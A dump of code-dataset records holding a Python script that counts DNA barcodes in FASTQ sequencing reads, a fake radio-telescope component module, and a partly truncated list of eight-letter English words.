number\r\n\r\ncurRow = 0;\r\ncurIndex = 0;\r\n\r\nfor curLine in fileinput.input([barcodeMapFn]):\r\n curLineP = curLine.rstrip().split(\"\\t\");\r\n if(curRow > 0 and curLineP[0] != '') :\r\n barcode2indexD[curLineP[3]] = curIndex;\r\n barcodeRc2indexD[rcSeqFc(curLineP[3])] = curIndex;\r\n curIndex = curIndex + 1;\r\n\r\n #print(rcSeqFc(curLineP[3]));\r\n\r\n\r\n curRow = curRow + 1;\r\n\r\nbarcodeArrayLen = curIndex;\r\n\r\n\r\n#print(barcode2indexD[\"GCCTATTAACTCACTA\"]);\r\n#print(\"Results - \" + str(barcodeRc2indexD[\"GAGTCTCATGTTCTGA\"]));\r\n\r\n\r\n################################################\r\n# Perform calcs for a specific fastq file #\r\n################################################\r\n#For R1, reverse complement\r\n\r\noutCountFn = countsDir + \"counts.\" + sampName + \".2.1.1.csv\";\r\noutQcFn = qcDir + \"qc.\" + sampName + \".2.1.1.csv\";\r\n\r\nfastqFnFull = seqDir + fastqFn;\r\n\r\n\r\n############### Set parameters ###########################\r\n\r\nreSiteRc1 = \"TCTAGAGGTACC\"; #Perfect match\r\nreSiteRc2 = \"TCTAGACGTACC\"; #Second match\r\nreSiteRc3 = \"TCTAGAAGTACC\"; #Third match\r\nreSiteRc4 = \"TCTAGATGTACC\"; #Fourth match\r\n\r\nreSiteV = [reSiteRc1,reSiteRc2,reSiteRc3,reSiteRc4];\r\n\r\n\r\n#primer1Rc = \"CGACGCTCTTCCGATCT\";\r\n\r\n#curExp sampName\r\n#curCountFn outCountFn\r\n#curFastQFn fastqFn\r\n\r\n############### Iterate through rows of a fastq file - Detailed #############\r\n\r\n\r\nbarcodeCountV = [0] * barcodeArrayLen;\r\n\r\nif loopDetailedB :\r\n\r\n reSiteLocV = []; #Location of restriction enzyme site matches\r\n reSiteLocLaxV = []; #Location of restriction enzyme site matches, relaxed\r\n\r\n eightyFourD = {}; #Dictionary counting sequences at position 84;\r\n\r\n bcStatusV = []; #Vector with whether a good barcode was found\r\n #-1 no RE site; 0 = no bc hit; 1=good bc hit\r\n\r\n\r\n curRow = 0;\r\n\r\n\r\n for curLine in fileinput.input([fastqFnFull]):\r\n\r\n if curRow % 4 == 1 : #Only take certain rows of the fastq\r\n #print(curLine);\r\n\r\n #Restriction Enzyme site match\r\n curResLoc = curLine.find(reSiteRc1);\r\n #print(curResLoc);\r\n reSiteLocV.append(curResLoc);\r\n\r\n #Sequences location at position 84 (looking for RE)\r\n curPos84 = curLine[84:96];\r\n #print(curPos84);\r\n if curPos84 in eightyFourD :\r\n eightyFourD[curPos84] = eightyFourD[curPos84] + 
1;\r\n else :\r\n eightyFourD[curPos84] = 1;\r\n\r\n #Find RE site by looping through possibilities, prioritize best match\r\n curResLoc = -1;\r\n for curRe in reSiteV[::-1] :\r\n newPos = curLine.find(curRe);\r\n if newPos > 0 :\r\n curResLoc = newPos;\r\n reSiteLocLaxV.append(curResLoc);\r\n\r\n #Use the updated RE location to extract the barcode (revComp in sequence)\r\n if curResLoc > 0 :\r\n curBcRcSeq = curLine[(curResLoc-16):curResLoc]\r\n #print(curBcRcSeq);\r\n\r\n if curBcRcSeq in barcodeRc2indexD :\r\n #print(barcodeRc2indexD[curBcRcSeq])\r\n barcodeCountV[barcodeRc2indexD[curBcRcSeq]] = barcodeCountV[barcodeRc2indexD[curBcRcSeq]] + 1\r\n bcStatusV.append(1);\r\n else :\r\n bcStatusV.append(0);\r\n else :\r\n bcStatusV.append(-1);\r\n\r\n curRow = curRow + 1;\r\n\r\n\r\n\r\n ### Print out various stats ####\r\n reSiteLocV.sort();\r\n print(reSiteLocV);\r\n\r\n reSiteLocLaxV.sort();\r\n print(reSiteLocLaxV);\r\n\r\n numNoRe = sum(1 for item in bcStatusV if item==(-1));\r\n numNoHit = sum(1 for item in bcStatusV if item==(0));\r\n numHit = sum(1 for item in bcStatusV if item==(1));\r\n\r\n print(\"RE Found Perc = \" + str(numHit/len(bcStatusV)));\r\n\r\n #for curKey in eightyFourD :\r\n # print(curKey + \" - \" + str(eightyFourD[curKey]))\r\n\r\n #print(\",\".join(map(str,barcodeCountV)));\r\n\r\n\r\n############### Iterate through rows of a fastq file - Fast/efficient #############\r\n\r\nif loopFastB :\r\n\r\n now = datetime.now()\r\n\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n print(\"Starting Current Time =\", current_time)\r\n\r\n reSiteLocLaxV = []; #Location of restriction enzyme site matches, relaxed\r\n eightyFourD = {}; #Dictionary counting sequences at position 84;\r\n\r\n bcStatusV = []; #Vector with whether a good barcode was found\r\n #-1 no RE site; 0 = no bc hit; 1=good bc hit\r\n\r\n curRow = 0;\r\n\r\n #for curLine in fileinput.input([fastqFnFull]):\r\n with gzip.open(fastqFnFull,'rt') as f:\r\n\r\n for curLine in f:\r\n #print('got line', line)\r\n\r\n if curRow % 4 == 1 : #Only take certain rows of the fastq\r\n #print(curLine);\r\n\r\n curResLoc = -1;\r\n\r\n curPos84 = curLine[84:96];\r\n\r\n if curPos84 in reSiteV :\r\n curResLoc = 84;\r\n else :\r\n curPos83 = curLine[83:95];\r\n if curPos83 in reSiteV :\r\n curResLoc = 83;\r\n else :\r\n curPos82 = curLine[82:94];\r\n if curPos82 in reSiteV :\r\n curResLoc = 82;\r\n else :\r\n curPos85 = curLine[85:97];\r\n if curPos85 in reSiteV :\r\n curResLoc = 85;\r\n else : #Find RE site by looping through possibilities, prioritize best match\r\n for curRe in reSiteV[::-1] :\r\n newPos = curLine.find(curRe);\r\n if newPos > 0 :\r\n curResLoc = newPos;\r\n\r\n reSiteLocLaxV.append(curResLoc);\r\n\r\n #Use the updated RE location to extract the barcode (revComp in sequence)\r\n if curResLoc > 0 :\r\n curBcRcSeq = curLine[(curResLoc-16):curResLoc]\r\n #print(curBcRcSeq);\r\n\r\n if curBcRcSeq in barcodeRc2indexD :\r\n #print(barcodeRc2indexD[curBcRcSeq])\r\n barcodeCountV[barcodeRc2indexD[curBcRcSeq]] = barcodeCountV[barcodeRc2indexD[curBcRcSeq]] + 1\r\n bcStatusV.append(1);\r\n else :\r\n bcStatusV.append(0);\r\n else :\r\n bcStatusV.append(-1);\r\n\r\n curRow = curRow + 1;\r\n\r\n ### Print out various stats ####\r\n\r\n #reSiteLocLaxV.sort();\r\n #print(reSiteLocLaxV);\r\n\r\n numNoRe = sum(1 for item in bcStatusV if item==(-1));\r\n numNoHit = sum(1 for item in bcStatusV if item==(0));\r\n numHit = sum(1 for item in bcStatusV if item==(1));\r\n\r\n print(\"BC Found Perc = \" + str(numHit/len(bcStatusV)));\r\n 
print(\"No Hit Perc = \" + str(numNoHit/len(bcStatusV)));\r\n print(\"No RE Perc = \" + str(numNoRe/len(bcStatusV)));\r\n\r\n\r\n #for curKey in eightyFourD :\r\n # print(curKey + \" - \" + str(eightyFourD[curKey]))\r\n\r\n #print(\",\".join(map(str,barcodeCountV)));\r\n\r\n now = datetime.now()\r\n\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n print(\"Starting Current Time =\", current_time)\r\n\r\n\r\nif writeCountsB :\r\n\r\n curCountF = open(outCountFn,\"w\");\r\n curCountF.write(\",\".join(map(str,barcodeCountV)) + \"\\n\");\r\n curCountF.close();\r\n\r\n curQcF = open(outQcFn,\"w\");\r\n curQcF.write(\",\".join(map(str,[sampName,numHit,numNoHit,numNoRe])) + \"\\n\");\r\n curQcF.close();\r\n\r\n\r\nendProgram();\r\n\r\nif False :\r\n curCountF = open(\"sumStats.mpra.csv\",\"w\");\r\n for curLineV in summaryStatsM :\r\n curCountF.write(\",\".join(map(str,curLineV)) + \"\\n\");\r\n curCountF.close();\r\n\r\n################################################\r\n# Conclusions Notes #\r\n################################################\r\n\r\n#Some RE sites aren't found because they're not perfect\r\n#Almost all RE sites are in positions 82,83,84,85; most in 84\r\n #Could be used to find imperfect sites that still have barcode\r\n#Primer Site 2 is a complete mess,\r\n #often starts with TCA, not TCT, very short\r\n#Real at position 84 TCTAGAGGTACC (98)\r\n #Common alternative at 84 TCTAGACGTACC (83), TCTAGAAGTACC (11), TCTAGATGTACC (4)\r\n #Also some shifted one base\r\n#Generally 75-80% of sequences have a reverse barcode hit\r\n#Numbers are better and there is less RE wobble for hit\r\n","sub_path":"arrayProc/arrayProc.2.1.1.py","file_name":"arrayProc.2.1.1.py","file_ext":"py","file_size_in_byte":14039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"488762861","text":"\"\"\"Components for a fake telescope.\"\"\"\n\nfrom typing import List, Tuple, Dict, Any, Union, Optional\n\nfrom katpoint import Antenna, Target, rad2deg, deg2rad, wrap_angle, construct_azel_target\n\nfrom kattelmod.component import TelstateUpdatingComponent, TargetObserverMixin\nfrom kattelmod.session import CaptureState\n\n\nclass Subarray(TelstateUpdatingComponent):\n def __init__(self, config_label: str = 'unknown', band: str = 'l', product: str = 'c856M4k',\n dump_rate: float = 1.0, sub_nr: int = 1, pool_resources: str = '') -> None:\n super(Subarray, self).__init__()\n self._initialise_attributes(locals())\n\n\nclass AntennaPositioner(TargetObserverMixin, TelstateUpdatingComponent):\n def __init__(self, observer: str = '',\n real_az_min_deg: float = -185.0, real_az_max_deg: float = 275.0,\n real_el_min_deg: float = 15.0, real_el_max_deg: float = 92.0,\n max_slew_azim_dps: float = 2.0, max_slew_elev_dps: float = 1.0,\n inner_threshold_deg: float = 0.01) -> None:\n super(AntennaPositioner, self).__init__()\n self._initialise_attributes(locals())\n self.activity = 'stop'\n self.target = ''\n self.pos_actual_scan_azim = self.pos_request_scan_azim = 0.0\n self.pos_actual_scan_elev = self.pos_request_scan_elev = 90.0\n\n @property\n def target(self) -> Union[str, Target]:\n return self._target\n @target.setter # noqa: E301\n def target(self, target: Union[str, Target]) -> None:\n new_target = Target(target, antenna=self._observer) if target else ''\n if new_target != self._target and self.activity in ('scan', 'track', 'slew'):\n self.activity = 'slew' if new_target else 'stop'\n self._target = new_target\n\n def _update(self, timestamp: float) -> None:\n 
super(AntennaPositioner, self)._update(timestamp)\n elapsed_time = self._elapsed_time\n if self.activity in ('error', 'stop'):\n return\n az, el = self.pos_actual_scan_azim, self.pos_actual_scan_elev\n target = construct_azel_target(deg2rad(az), deg2rad(90.0)) \\\n if self.activity == 'stow' else self.target\n if not target:\n return\n requested_az, requested_el = target.azel(timestamp, self.observer)\n requested_az = rad2deg(wrap_angle(requested_az))\n requested_el = rad2deg(requested_el)\n delta_az = wrap_angle(requested_az - az, period=360.)\n delta_el = requested_el - el\n # Truncate velocities to slew rate limits and update position\n max_delta_az = self.max_slew_azim_dps * elapsed_time\n max_delta_el = self.max_slew_elev_dps * elapsed_time\n az += min(max(delta_az, -max_delta_az), max_delta_az)\n el += min(max(delta_el, -max_delta_el), max_delta_el)\n # Truncate coordinates to antenna limits\n az = min(max(az, self.real_az_min_deg), self.real_az_max_deg)\n el = min(max(el, self.real_el_min_deg), self.real_el_max_deg)\n # Check angular separation to determine lock\n dish = construct_azel_target(deg2rad(az), deg2rad(el))\n error = rad2deg(target.separation(dish, timestamp, self.observer))\n lock = error < self.inner_threshold_deg\n if lock and self.activity == 'slew':\n self.activity = 'track'\n elif not lock and self.activity == 'track':\n self.activity = 'slew'\n # Update position sensors\n self.pos_request_scan_azim = requested_az\n self.pos_request_scan_elev = requested_el\n self.pos_actual_scan_azim = az\n self.pos_actual_scan_elev = el\n # print 'elapsed: %g, max_daz: %g, max_del: %g, daz: %g, del: %g, error: %g' % \\\n # (elapsed_time, max_delta_az, max_delta_el, delta_az, delta_el, error)\n\n\nclass Environment(TelstateUpdatingComponent):\n def __init__(self) -> None:\n super(Environment, self).__init__()\n self._initialise_attributes(locals())\n self.pressure = 1020.3\n self.relative_humidity = 60.0\n self.temperature = 25.0\n self.wind_speed = 4.2\n self.wind_direction = 90.0\n\n\nclass CorrelatorBeamformer(TargetObserverMixin, TelstateUpdatingComponent):\n def __init__(self, product: str = 'c856M4k', n_chans: int = 4096, n_accs: int = 104448,\n bls_ordering: List[Tuple[str, str]] = [], bandwidth: float = 856000000.0,\n sync_time: float = 1443692800.0,\n int_time: float = 0.49978856074766354,\n scale_factor_timestamp: float = 1712000000,\n center_freq: float = 1284000000.0, observer: str = ''):\n super(CorrelatorBeamformer, self).__init__()\n self._initialise_attributes(locals())\n self.target = ''\n self.auto_delay_enabled = True\n self._add_dummy_methods('capture_start capture_stop')\n\n\nclass ScienceDataProcessor(TelstateUpdatingComponent):\n def __init__(self) -> None:\n super(ScienceDataProcessor, self).__init__()\n self._initialise_attributes(locals())\n self._add_dummy_methods('product_deconfigure capture_init capture_done')\n\n async def product_configure(self, sub: Subarray, receptors: List[Antenna],\n start_time: Optional[float] = None) -> CaptureState:\n return CaptureState.STARTED\n\n async def get_telstate(self) -> str:\n return ''\n\n\nclass Observation(TelstateUpdatingComponent):\n def __init__(self, params: Dict[str, Any] = {}):\n super(Observation, self).__init__()\n self._initialise_attributes(locals())\n self.label = ''\n self.script_log = ''\n self.activity = 
'idle'\n","sub_path":"kattelmod/systems/mkat/fake.py","file_name":"fake.py","file_ext":"py","file_size_in_byte":5679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"25124754","text":"w = \t\t['absolute',\n\t\t\t'admonish',\n\t\t\t'advisory',\n\t\t\t'agnostic',\n\t\t\t'altruism',\n\t\t\t'asteroid',\n\t\t\t'aversion',\n\t\t\t'bachelor',\n\t\t\t'banished',\n\t\t\t'anister',\n\t\t\t'ankrupt',\n\t\t\t'aritone',\n\t\t\t'eautify',\n\t\t\t'ehavior',\n\t\t\t'irdcage',\n\t\t\t'lackout',\n\t\t\t'lockage',\n\t\t\t'ludgeon',\n\t\t\t'otulism',\n\t\t\t'oundary',\n\t\t\t'rackish',\n\t\t\t'ungalow',\n\t\t\t'utchery',\n\t\t\t'anister',\n\t\t\t'ategory',\n\t\t\t'auldron',\n\t\t\t'hildren',\n\t\t\t'hipmunk',\n\t\t\t'hlorine',\n\t\t\t'larinet',\n\t\t\t'loister',\n\t\t\t'lothier',\n\t\t\t'oliseum',\n\t\t\t'omplain',\n\t\t\t'omputer',\n\t\t\t'ourtesy',\n\t\t\t'reation',\n\t\t\t'ulinary',\n\t\t\t'ylinder',\n\t\t\t'emolish',\n\t\t\t'ialogue',\n\t\t\t'inosaur',\n\t\t\t'iscount',\n\t\t\t'octrine',\n\t\t\t'omestic',\n\t\t\t'ominate',\n\t\t\t'ynamite',\n\t\t\t'yslexia',\n\t\t\t'ducator',\n\t\t\t'migrant',\n\t\t\t'mulsify',\n\t\t\t'normity',\n\t\t\t'avorite',\n\t\t\t'erocity',\n\t\t\t'ilament',\n\t\t\t'lounder',\n\t\t\t'lourish',\n\t\t\t'raction',\n\t\t\t'ragment',\n\t\t\t'righten',\n\t\t\t'umigate',\n\t\t\t'asoline',\n\t\t\t'oldfish',\n\t\t\t'raceful',\n\t\t\t'abitude',\n\t\t\t'andgrip',\n\t\t\t'andover',\n\t\t\t'andsome',\n\t\t\t'andwork',\n\t\t\t'angbird',\n\t\t\t'angover',\n\t\t\t'ardline',\n\t\t\t'armonic',\n\t\t\t'ayfield',\n\t\t\t'azelnut',\n\t\t\t'eadlock',\n\t\t\t'eadlong',\n\t\t\t'eadwork',\n\t\t\t'edonism',\n\t\t\t'edonist',\n\t\t\t'eliport',\n\t\t\t'erdsman',\n\t\t\t'indmost',\n\t\t\t'oldfast',\n\t\t\t'omeland',\n\t\t\t'omesick',\n\t\t\t'omespun',\n\t\t\t'omeward',\n\t\t\t'ornbeam',\n\t\t\t'orsefly',\n\t\t\t'orseman',\n\t\t\t'ospital',\n\t\t\t'ostelry',\n\t\t\t'ousefly',\n\t\t\t'ouseman',\n\t\t\t'owitzer',\n\t\t\t'uckster',\n\t\t\t'umanely',\n\t\t\t'umanist',\n\t\t\t'humanity',\n\t\t\t'humanize',\n\t\t\t'humanoid',\n\t\t\t'humblest',\n\t\t\t'humbling',\n\t\t\t'humoring',\n\t\t\t'humorist',\n\t\t\t'humpback',\n\t\t\t'hungrily',\n\t\t\t'hurdling',\n\t\t\t'hurtling',\n\t\t\t'hydrogen',\n\t\t\t'hypnotic',\n\t\t\t'hysteria',\n\t\t\t'hysteric',\n\t\t\t'icebound',\n\t\t\t'ideogram',\n\t\t\t'idolater',\n\t\t\t'idolatry',\n\t\t\t'impacted',\n\t\t\t'imparted',\n\t\t\t'implored',\n\t\t\t'imported',\n\t\t\t'imposter',\n\t\t\t'improved',\n\t\t\t'impudent',\n\t\t\t'impugned',\n\t\t\t'impurely',\n\t\t\t'inchoate',\n\t\t\t'inclosed',\n\t\t\t'incubate',\n\t\t\t'incurved',\n\t\t\t'inductor',\n\t\t\t'indulger',\n\t\t\t'indurate',\n\t\t\t'industry',\n\t\t\t'inflamed',\n\t\t\t'inflated',\n\t\t\t'informal',\n\t\t\t'informed',\n\t\t\t'ingrowth',\n\t\t\t'injector',\n\t\t\t'insomuch',\n\t\t\t'insulate',\n\t\t\t'insulted',\n\t\t\t'integral',\n\t\t\t'intercom',\n\t\t\t'interval',\n\t\t\t'investor',\n\t\t\t'involute',\n\t\t\t'inwardly',\n\t\t\t'islander',\n\t\t\t'isolated',\n\t\t\t'isometry',\n\t\t\t'isopleth',\n\t\t\t'isotherm',\n\t\t\t'jalousie',\n\t\t\t'jargoned',\n\t\t\t'jaundice',\n\t\t\t'jauntier',\n\t\t\t'jauntily',\n\t\t\t'jawboned',\n\t\t\t'jealousy',\n\t\t\t'jeopardy',\n\t\t\t'jocundly',\n\t\t\t'jointure',\n\t\t\t'jokingly',\n\t\t\t'jongleur',\n\t\t\t'jostling',\n\t\t\t'jousting',\n\t\t\t'jowliest',\n\t\t\t'jubilant',\n\t\t\t'jubilate',\n\t\t\t'judgment',\n\t\t\t'jumbling',\n\t\t\t'jumpiest',\n\t\t\t'junglier',\n\t\t\t'keyboard',\n\t\t\t'keypunch',\n\t\t\t'kilobyte',\n\
t\t\t'kilogram',\n\t\t\t'klystron',\n\t\t\t'knighted',\n\t\t\t'knightly',\n\t\t\t'knitwear',\n\t\t\t'knowable',\n\t\t\t'kohlrabi',\n\t\t\t'laboring',\n\t\t\t'lacewing',\n\t\t\t'laconism',\n\t\t\t'ladyship',\n\t\t\t'lambency',\n\t\t\t'lambskin',\n\t\t\t'languish',\n\t\t\t'lankiest',\n\t\t\t'lardiest',\n\t\t\t'latching',\n\t\t\t'latchkey',\n\t\t\t'laughter',\n\t\t\t'launched',\n\t\t\t'launcher',\n\t\t\t'lavished',\n\t\t\t'lavisher',\n\t\t\t'layering',\n\t\t\t'laywomen',\n\t\t\t'leaching',\n\t\t\t'leashing',\n\t\t\t'leftward',\n\t\t\t'legation',\n\t\t\t'lethargy',\n\t\t\t'licensor',\n\t\t\t'lifeboat',\n\t\t\t'ligament',\n\t\t\t'ligature',\n\t\t\t'liquored',\n\t\t\t'literacy',\n\t\t\t'loamiest',\n\t\t\t'loathing',\n\t\t\t'locating',\n\t\t\t'locative',\n\t\t\t'lockstep',\n\t\t\t'lodestar',\n\t\t\t'lodgment',\n\t\t\t'longwise',\n\t\t\t'lordship',\n\t\t\t'lovebird',\n\t\t\t'lovesick',\n\t\t\t'lowering',\n\t\t\t'luckiest',\n\t\t\t'lukewarm',\n\t\t\t'luminary',\n\t\t\t'lumpfish',\n\t\t\t'lumpiest',\n\t\t\t'lunkhead',\n\t\t\t'lurching',\n\t\t\t'lymphoid',\n\t\t\t'machined',\n\t\t\t'madhouse',\n\t\t\t'magister',\n\t\t\t'magnetic',\n\t\t\t'maidenly',\n\t\t\t'majoring',\n\t\t\t'majority',\n\t\t\t'maledict',\n\t\t\t'maligned',\n\t\t\t'maligner',\n\t\t\t'malinger',\n\t\t\t'mandible',\n\t\t\t'mangiest',\n\t\t\t'mangrove',\n\t\t\t'manicure',\n\t\t\t'manifest',\n\t\t\t'manifold',\n\t\t\t'manliest',\n\t\t\t'manpower',\n\t\t\t'marbling',\n\t\t\t'marching',\n\t\t\t'marigold',\n\t\t\t'marquise',\n\t\t\t'masterly',\n\t\t\t'matchbox',\n\t\t\t'matronly',\n\t\t\t'maturely',\n\t\t\t'maturing',\n\t\t\t'maverick',\n\t\t\t'medaling',\n\t\t\t'medalist',\n\t\t\t'mediator',\n\t\t\t'megavolt',\n\t\t\t'meltdown',\n\t\t\t'mensural',\n\t\t\t'merciful',\n\t\t\t'metaling',\n\t\t\t'metaphor',\n\t\t\t'methadon',\n\t\t\t'methanol',\n\t\t\t'metrical',\n\t\t\t'milkwort',\n\t\t\t'minstrel',\n\t\t\t'minutely',\n\t\t\t'mirthful',\n\t\t\t'misbegot',\n\t\t\t'misdealt',\n\t\t\t'misheard',\n\t\t\t'misjudge',\n\t\t\t'misplace',\n\t\t\t'misquote',\n\t\t\t'misruled',\n\t\t\t'mistaken',\n\t\t\t'modality',\n\t\t\t'modeling',\n\t\t\t'modernly',\n\t\t\t'modestly',\n\t\t\t'modishly',\n\t\t\t'modulate',\n\t\t\t'moisture',\n\t\t\t'molarity',\n\t\t\t'moleskin',\n\t\t\t'monarchy',\n\t\t\t'monastic',\n\t\t\t'monetary',\n\t\t\t'monkfish',\n\t\t\t'monsieur',\n\t\t\t'monstera',\n\t\t\t'moralist',\n\t\t\t'morality',\n\t\t\t'moralize',\n\t\t\t'morbidly',\n\t\t\t'mordancy',\n\t\t\t'morphine',\n\t\t\t'morticed',\n\t\t\t'mortised',\n\t\t\t'moseying',\n\t\t\t'motherly',\n\t\t\t'mouthier',\n\t\t\t'mouthing',\n\t\t\t'moveably',\n\t\t\t'movingly',\n\t\t\t'mucilage',\n\t\t\t'muckiest',\n\t\t\t'mulching',\n\t\t\t'mulcting',\n\t\t\t'murkiest',\n\t\t\t'muscadel',\n\t\t\t'muscatel',\n\t\t\t'muscling',\n\t\t\t'musicale',\n\t\t\t'musingly',\n\t\t\t'mustache',\n\t\t\t'mutchkin',\n\t\t\t'myriapod',\n\t\t\t'mystique',\n\t\t\t'mythical',\n\t\t\t'narghile',\n\t\t\t'natively',\n\t\t\t'naturism',\n\t\t\t'necropsy',\n\t\t\t'neighbor',\n\t\t\t'neoplasm',\n\t\t\t'nepotism',\n\t\t\t'neurotic',\n\t\t\t'nightcap',\n\t\t\t'nightjar',\n\t\t\t'nimblest',\n\t\t\t'nobelium',\n\t\t\t'normalcy',\n\t\t\t'notarize',\n\t\t\t'novelist',\n\t\t\t'nugatory',\n\t\t\t'numeracy',\n\t\t\t'obduracy',\n\t\t\t'obdurate',\n\t\t\t'obeisant',\n\t\t\t'obituary',\n\t\t\t'obligate',\n\t\t\t'obscured',\n\t\t\t'obstacle',\n\t\t\t'obtained',\n\t\t\t'obtusely',\n\t\t\t'obviated',\n\t\t\t'ochering',\n\t\t\t'olibanum',\n\t\t\t'oligarch',\n\t\t\t'olympiad',\n\t\t\t'opaquely',\n\t\t\t'opaquing',\n\t\t\t'operatic',\n\t\
t\t'ordinate',\n\t\t\t'organdie',\n\t\t\t'organism',\n\t\t\t'organist',\n\t\t\t'organize',\n\t\t\t'orgasmic',\n\t\t\t'orgastic',\n\t\t\t'oriental',\n\t\t\t'origanum',\n\t\t\t'ornately',\n\t\t\t'orphaned',\n\t\t\t'osculate',\n\t\t\t'outbrave',\n\t\t\t'outbreak',\n\t\t\t'outcried',\n\t\t\t'outdrive',\n\t\t\t'outfaced',\n\t\t\t'outfield',\n\t\t\t'outflank',\n\t\t\t'outlawed',\n\t\t\t'outlawry',\n\t\t\t'outlined',\n\t\t\t'outlived',\n\t\t\t'outlying',\n\t\t\t'outmarch',\n\t\t\t'outpaced',\n\t\t\t'outraced',\n\t\t\t'outraged',\n\t\t\t'outreach',\n\t\t\t'outrival',\n\t\t\t'outshine',\n\t\t\t'outsider',\n\t\t\t'outsized',\n\t\t\t'outspeak',\n\t\t\t'outspend',\n\t\t\t'outvying',\n\t\t\t'outweigh',\n\t\t\t'overbusy',\n\t\t\t'overcast',\n\t\t\t'overhand',\n\t\t\t'overhang',\n\t\t\t'overhaul',\n\t\t\t'overhung',\n\t\t\t'overlaid',\n\t\t\t'overlain',\n\t\t\t'overland',\n\t\t\t'overmuch',\n\t\t\t'overpaid',\n\t\t\t'overplay',\n\t\t\t'overstay',\n\t\t\t'ovulated',\n\t\t\t'palimony',\n\t\t\t'palmiest',\n\t\t\t'palsying',\n\t\t\t'panicked',\n\t\t\t'panicled',\n\t\t\t'parching',\n\t\t\t'parhelic',\n\t\t\t'parodist',\n\t\t\t'paroling',\n\t\t\t'paroquet',\n\t\t\t'paroxysm',\n\t\t\t'partible',\n\t\t\t'particle',\n\t\t\t'partying',\n\t\t\t'pastiche',\n\t\t\t'pastured',\n\t\t\t'patchier',\n\t\t\t'patchily',\n\t\t\t'patching',\n\t\t\t'pathogen',\n\t\t\t'peaching',\n\t\t\t'pearling',\n\t\t\t'pectoral',\n\t\t\t'peculiar',\n\t\t\t'pedaling',\n\t\t\t'pedantic',\n\t\t\t'pedantry',\n\t\t\t'pegboard',\n\t\t\t'penlight',\n\t\t\t'penumbra',\n\t\t\t'perching',\n\t\t\t'perianth',\n\t\t\t'personal',\n\t\t\t'perusing',\n\t\t\t'pestling',\n\t\t\t'petaloid',\n\t\t\t'phenolic',\n\t\t\t'phenylic',\n\t\t\t'phonemic',\n\t\t\t'phonetic',\n\t\t\t'phoniest',\n\t\t\t'phrasing',\n\t\t\t'physical',\n\t\t\t'physique',\n\t\t\t'picayune',\n\t\t\t'pictured',\n\t\t\t'pilaster',\n\t\t\t'pilchard',\n\t\t\t'pilewort',\n\t\t\t'pilotage',\n\t\t\t'pinafore',\n\t\t\t'pinochle',\n\t\t\t'piquancy',\n\t\t\t'pitchmen',\n\t\t\t'plainest',\n\t\t\t'planchet',\n\t\t\t'plashing',\n\t\t\t'plastery',\n\t\t\t'platform',\n\t\t\t'platinum',\n\t\t\t'platonic',\n\t\t\t'playsuit',\n\t\t\t'playtime',\n\t\t\t'pleading',\n\t\t\t'pleasing',\n\t\t\t'pleating',\n\t\t\t'plectron',\n\t\t\t'plectrum',\n\t\t\t'pleonasm',\n\t\t\t'pleurisy',\n\t\t\t'ploughed',\n\t\t\t'pluckier',\n\t\t\t'plucking',\n\t\t\t'plumaged',\n\t\t\t'plumbery',\n\t\t\t'plumbing',\n\t\t\t'plushier',\n\t\t\t'plutonic',\n\t\t\t'poaching',\n\t\t\t'podgiest',\n\t\t\t'podiatry',\n\t\t\t'poetical',\n\t\t\t'polarity',\n\t\t\t'polarize',\n\t\t\t'polished',\n\t\t\t'polisher',\n\t\t\t'polymath',\n\t\t\t'pomading',\n\t\t\t'pomander',\n\t\t\t'ponytail',\n\t\t\t'porkiest',\n\t\t\t'portable',\n\t\t\t'postcard',\n\t\t\t'postiche',\n\t\t\t'postlude',\n\t\t\t'postmark',\n\t\t\t'postured',\n\t\t\t'potsherd',\n\t\t\t'pouching',\n\t\t\t'poultice',\n\t\t\t'poundage',\n\t\t\t'powerful',\n\t\t\t'powering',\n\t\t\t'prankish',\n\t\t\t'pratique',\n\t\t\t'prickled',\n\t\t\t'prideful',\n\t\t\t'priestly',\n\t\t\t'primeval',\n\t\t\t'princely',\n\t\t\t'probated',\n\t\t\t'procaine',\n\t\t\t'proclaim',\n\t\t\t'prodigal',\n\t\t\t'profaned',\n\t\t\t'profiled',\n\t\t\t'profited',\n\t\t\t'promised',\n\t\t\t'prostyle',\n\t\t\t'proudest',\n\t\t\t'provable',\n\t\t\t'provably',\n\t\t\t'province',\n\t\t\t'proximal',\n\t\t\t'psalmody',\n\t\t\t'psyching',\n\t\t\t'ptyalism',\n\t\t\t'pubertal',\n\t\t\t'publican',\n\t\t\t'pudgiest',\n\t\t\t'pulmonic',\n\t\t\t'pulsated',\n\t\t\t'punchier',\n\t\t\t'punished',\n\t\t\t'punitory',\n\t\t\t'purblind',\n\t\t\
t'purchase',\n\t\t\t'purslane',\n\t\t\t'putridly',\n\t\t\t'quackery',\n\t\t\t'quacking',\n\t\t\t'quagmire',\n\t\t\t'quainter',\n\t\t\t'quaintly',\n\t\t\t'quakiest',\n\t\t\t'qualmish',\n\t\t\t'quantify',\n\t\t\t'quashing',\n\t\t\t'queasily',\n\t\t\t'querying',\n\t\t\t'questing',\n\t\t\t'question',\n\t\t\t'quickest',\n\t\t\t'quipster',\n\t\t\t'quotable',\n\t\t\t'quotably',\n\t\t\t'raftsmen',\n\t\t\t'ragouted',\n\t\t\t'rakishly',\n\t\t\t'rambling',\n\t\t\t'randiest',\n\t\t\t'randomly',\n\t\t\t'rangiest',\n\t\t\t'ransomed',\n\t\t\t'rationed',\n\t\t\t'ravingly',\n\t\t\t'ravished',\n\t\t\t'rawboned',\n\t\t\t'reaching',\n\t\t\t'reacting',\n\t\t\t'reaction',\n\t\t\t'readjust',\n\t\t\t'readying',\n\t\t\t'rebating',\n\t\t\t'rebuking',\n\t\t\t'recoding',\n\t\t\t'recusant',\n\t\t\t'redshank',\n\t\t\t'reducing',\n\t\t\t'refacing',\n\t\t\t'refusing',\n\t\t\t'refuting',\n\t\t\t'regional',\n\t\t\t'relating',\n\t\t\t'relation',\n\t\t\t'relaunch',\n\t\t\t'relaxing',\n\t\t\t'relaying',\n\t\t\t'remaking',\n\t\t\t'removing',\n\t\t\t'repaying',\n\t\t\t'replying',\n\t\t\t'reposing',\n\t\t\t'republic',\n\t\t\t'reputing',\n\t\t\t'requital',\n\t\t\t'rescuing',\n\t\t\t'residual',\n\t\t\t'resoling',\n\t\t\t'resubmit',\n\t\t\t'resuming',\n\t\t\t'retaking',\n\t\t\t'retching',\n\t\t\t'revoking',\n\t\t\t'rhapsody',\n\t\t\t'rhyolite',\n